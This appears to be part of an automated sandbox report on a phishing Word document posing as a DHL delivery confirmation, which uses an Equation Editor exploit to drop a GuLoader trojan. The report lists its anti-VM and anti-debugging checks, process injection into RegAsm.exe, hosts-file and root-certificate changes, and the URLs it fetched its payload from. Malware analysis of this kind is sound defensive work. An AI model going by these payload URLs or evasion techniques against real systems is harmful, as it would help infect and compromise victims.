Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\subfolder1\filename1.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_0009689E LoadLibraryA,

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000002A69EF second address: 00000000002A69EF instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000002A6B43 second address: 00000000002A6B43 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000000917FD second address: 00000000000917FD instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000000916A4 second address: 00000000000916A4 instructions:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000002A69EF second address: 00000000002A69EF instructions:
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000002A6B43 second address: 00000000002A6B43 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000000917FD second address: 00000000000917FD instructions:
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 00000000000916A4 second address: 00000000000916A4 instructions:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00094580 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2516	Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2516	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2408	Thread sleep time: -480000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1552	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1552	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\69577.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger

Source: C:\Users\Public\69577.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00094580 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 6_2_00094450 LdrInitializeThunk,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0009689E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_000968B9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_000968D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_000968EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0009690A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0009692B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00096941 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_0009399A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00093997 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00095A17 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 6_2_00095EFD mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 90000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe

Source: RegAsm.exe, 00000006.00000002.2363904179.00000000012D0000.00000002.00000001.sdmp, filename1.exe, 0000000A.00000002.2362327201.00000000009B0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000006.00000002.2363904179.00000000012D0000.00000002.00000001.sdmp, filename1.exe, 0000000A.00000002.2362327201.00000000009B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000006.00000002.2363904179.00000000012D0000.00000002.00000001.sdmp, filename1.exe, 0000000A.00000002.2362327201.00000000009B0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Windows Management Instrumentation211	Registry Run Keys / Startup Folder1	Access Token Manipulation1	Masquerading121	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Process Injection112	File and Directory Permissions Modification1	LSASS Memory	Security Software Discovery831	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Virtualization/Sandbox Evasion34	Security Account Manager	Virtualization/Sandbox Evasion34	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools11	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Access Token Manipulation1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection112	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	System Information Discovery414	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc	23%	ReversingLabs	Document-RTF.Exploit.MathType

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt	27%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\subfolder1\filename1.exe	27%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\Public\69577.exe	27%	ReversingLabs	Win32.Trojan.Guloader

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://mscrl.micros	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bit.ly	67.199.248.10	true	false	high
teknik.io	5.79.72.163	true	false	high
onedrive.live.com	unknown	unknown	false	high
1ae2wq.bl.files.1drv.com	unknown	unknown	false	high
u.teknik.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://bit.ly/2NYVK6q	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://1ae2wq.bl.files.1drv.com/y4mF77Blnwr8TsPyz2B-1c6fGLZjEGCG_1HZbGIwXU3xbZegnh_KEVDyUwwuL1T_Nh-	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegAsm.exe, 00000006.00000002.2364332174.00000000028D0000.00000002.00000001.sdmp	false		high
https://u.teknik.io/WLjtp.txt	2NYVK6q[1].htm.2.dr	false		high
https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21111&authkey=AAYIwGN	RegAsm.exe, 00000006.00000002.2362029615.0000000000897000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/server1.crl0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	RegAsm.exe, 00000006.00000002.2364332174.00000000028D0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mscrl.micros	RegAsm.exe, 00000006.00000002.2367991308.000000001DB80000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://1ae2wq.bl.files.1drv.com/D	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net0D	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://1ae2wq.bl.files.1drv.com/	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false		high
https://secure.comodo.com/CPS0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	RegAsm.exe, 00000006.00000002.2362134802.00000000008D2000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/	RegAsm.exe, 00000006.00000002.2361986527.000000000087A000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
67.199.248.11	unknown	United States		396982	GOOGLE-PRIVATE-CLOUDUS	true
5.79.72.163	unknown	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	358185
Start date:	25.02.2021
Start time:	07:40:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 15s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.expl.evad.winDOC@7/21@6/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 81% (good quality ratio 41.4%) Quality average: 29.1% Quality standard deviation: 35.1%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.10, 205.185.216.42, 13.107.42.13, 13.107.42.12 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

